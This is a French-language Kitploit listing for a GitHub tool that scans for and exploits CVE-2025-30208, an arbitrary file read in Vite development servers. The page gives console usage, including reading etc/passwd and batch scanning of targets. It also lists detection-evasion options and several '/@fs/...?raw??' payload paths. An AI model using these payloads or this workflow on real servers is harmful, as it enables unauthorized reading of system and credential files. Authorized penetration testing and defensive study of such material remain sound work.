Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 est une vulnérabilité de lecture arbitraire de fichiers de sévérité moyenne dans le serveur de développement Vite (un outil de construction frontend populaire) | Kitploit
Outils/GitHubGitHub/th-secforge/cve-2025-30208
ReconnaissanceScanners de VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubth-secforge/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 est une vulnérabilité de lecture arbitraire de fichiers de sévérité moyenne dans le serveur de développement Vite (un outil de construction frontend populaire)

Voir le dépôt
143il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🔥 Scanner de vulnérabilité de lecture arbitraire de fichiers CVE-2025-30208 pour Vite

Python License Security Status Modular

Scanner de vulnérabilité avancé pour CVE-2025-30208 avec des fonctionnalités de niveau entreprise

Outil de test d'intrusion professionnel pour la détection de la vulnérabilité de lecture arbitraire de fichiers dans Vite

🚀 Démarrage rapide • 📋 Fonctionnalités • 🔧 Utilisation • 📊 Exemples • 🛡️ Sécurité


📖 Présentation

Il s'agit d'un scanner de vulnérabilité complet conçu pour détecter et exploiter la vulnérabilité CVE-2025-30208 dans les serveurs de développement Vite. La vulnérabilité permet un accès en lecture arbitraire à des fichiers via les points de terminaison du système de fichiers de Vite, exposant potentiellement des fichiers de configuration sensibles, du code source et des informations système.

🎯 Ce que fait cet outil

  • Détecte les instances Vite vulnérables à travers les réseaux
  • Exploite la vulnérabilité de lecture arbitraire de fichiers en toute sécurité
  • Découvre les fichiers sensibles et les données de configuration
  • Rapporte les résultats dans plusieurs formats (HTML, JSON, Console)
  • Gère les sessions de scan et les configurations
  • Gère les erreurs avec élégance grâce à des mécanismes de nouvelle tentative automatique

🏗️ Architecture modulaire

L'outil dispose désormais d'une architecture modulaire pour une meilleure maintenabilité et extensibilité :

  • CVE-2025-30208.py - Application principale du scanner
  • payloads.py - Charges utiles d'exploitation avancées (60+ variations)
  • sensitive_files.py - Base de données complète de fichiers sensibles (200+ fichiers)
  • html_template.py - Modèle de rapport HTML amélioré de style hacker

🚀 Démarrage rapide

Prérequis

pip3 install -r requirements.txt

Utilisation de base

python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 Fonctionnalités

🔍 Détection de vulnérabilité principale

  • 60+ charges utiles avancées : Techniques d'exploitation complètes pour une détection maximale
  • Détection intelligente : Analyse intelligente des réponses pour éviter les faux positifs
  • Validation en temps réel : Validation continue des réponses cibles
  • Tests complets : Teste tous les points de terminaison vulnérables connus

🛡️ Fonctionnalités de sécurité améliorées

  • Prise en charge des proxys : Configuration de proxy HTTP/HTTPS pour l'anonymat
  • En-têtes personnalisés : Contournement des WAF/IPS avec des en-têtes HTTP personnalisés
  • Limitation de débit : Délais configurables pour éviter la détection
  • Gestion des sessions : Sauvegarde et restauration des sessions de scan
  • Validation des entrées : Validation complète des paramètres

🔧 Capacités avancées

  • Scan par lots : Scan multi-threadé de plusieurs cibles
  • Découverte de fichiers sensibles : Découverte automatique de 200+ fichiers sensibles
  • Test de connectivité : Tests de protocoles TCP/UDP/HTTP/HTTPS
  • Récupération d'erreurs : Nouvelles tentatives automatiques avec backoff exponentiel
  • Journalisation complète : Journaux détaillés avec horodatage

📊 Rapports et sortie

  • 🎨 Rapports HTML améliorés : Beaux rapports de vulnérabilité de style hacker avec animations
  • Export JSON : Données structurées pour une analyse ultérieure
  • Sortie console : Retour d'information en temps réel avec code couleur
  • Fichiers journaux : Pistes d'audit détaillées
  • Interface Web interactive : Serveur Web intégré pour visualiser les rapports

🔧 Guide d'utilisation

1. Configuration de base

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. Test de vulnérabilité

CVE-2025-30208 > run

# Activer le mode verbeux pour une sortie détaillée
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. Scan par lots

CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Appuyez deux fois sur Entrée pour terminer]

4. Découverte de fichiers sensibles

CVE-2025-30208 > scan

5. Configuration avancée

# Configurer le proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# Définir des en-têtes personnalisés
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# Configurer la limitation de débit
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. Rapport HTML amélioré

# Générer un beau rapport HTML
CVE-2025-30208 > pull

# Démarrer le serveur Web pour visualiser le rapport
CVE-2025-30208 > web

# Démarrer le serveur Web sur un port spécifique
CVE-2025-30208 > web 8081

# Arrêter le serveur Web
CVE-2025-30208 > web off

📊 Référence des commandes

CommandeDescriptionExemple
set <option> <value>Définir les options de configurationset RHOST 192.168.1.100
show optionsAfficher les paramètres actuelsshow options
editÉditeur interactif d'optionsedit
run / exploitExécuter le test de vulnérabilitérun
batchScanner plusieurs cibles par lotsbatch
scanDécouvrir des fichiers sensiblesscan
pullExporter les résultats en HTML/JSONpull
web [on|off|port]Serveur Web pour les rapports HTMLweb 8080
saveSauvegarder la configuration de sessionsave
loadCharger la configuration de sessionload
testTester la connectivité à la cibletest
validateValider la configuration actuellevalidate
verboseActiver/désactiver le mode verbeuxverbose
proxyConfigurer les paramètres de proxyproxy
headersDéfinir des en-têtes HTTP personnalisésheaders
rateConfigurer la limitation de débitrate
logAfficher les informations de journalisationlog
help / ?Afficher l'aidehelp
exit / quitQuitter l'outilexit

⚙️ Options de configuration

OptionDescriptionValeur par défautValidation
RHOSTAdresse IP/nom d'hôte cible-Validation du nom d'hôte/IP
RPORTNuméro de port cible-Plage de ports (1-65535)
FILEPATHChemin du fichier à testeretc/passwdValidation du chemin
PROXYURL du proxy HTTP/HTTPS-Validation du format URL
VERBOSEActiver la sortie verbeusefalseValidation booléenne
RATE_LIMITDélai entre les requêtes (secondes)0.3Validation numérique
THREADSNombre de threads pour le scan par lots5Validation entière
TIMEOUTDélai d'attente des requêtes (secondes)5Validation entière
CUSTOM_HEADERSEn-têtes HTTP personnalisés (JSON){}Validation du format JSON

🎨 Système de charges utiles amélioré

Le scanner utilise désormais 60+ variations de charges utiles organisées dans payloads.py :

Charges utiles principales @fs

/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
Télécharger l’outil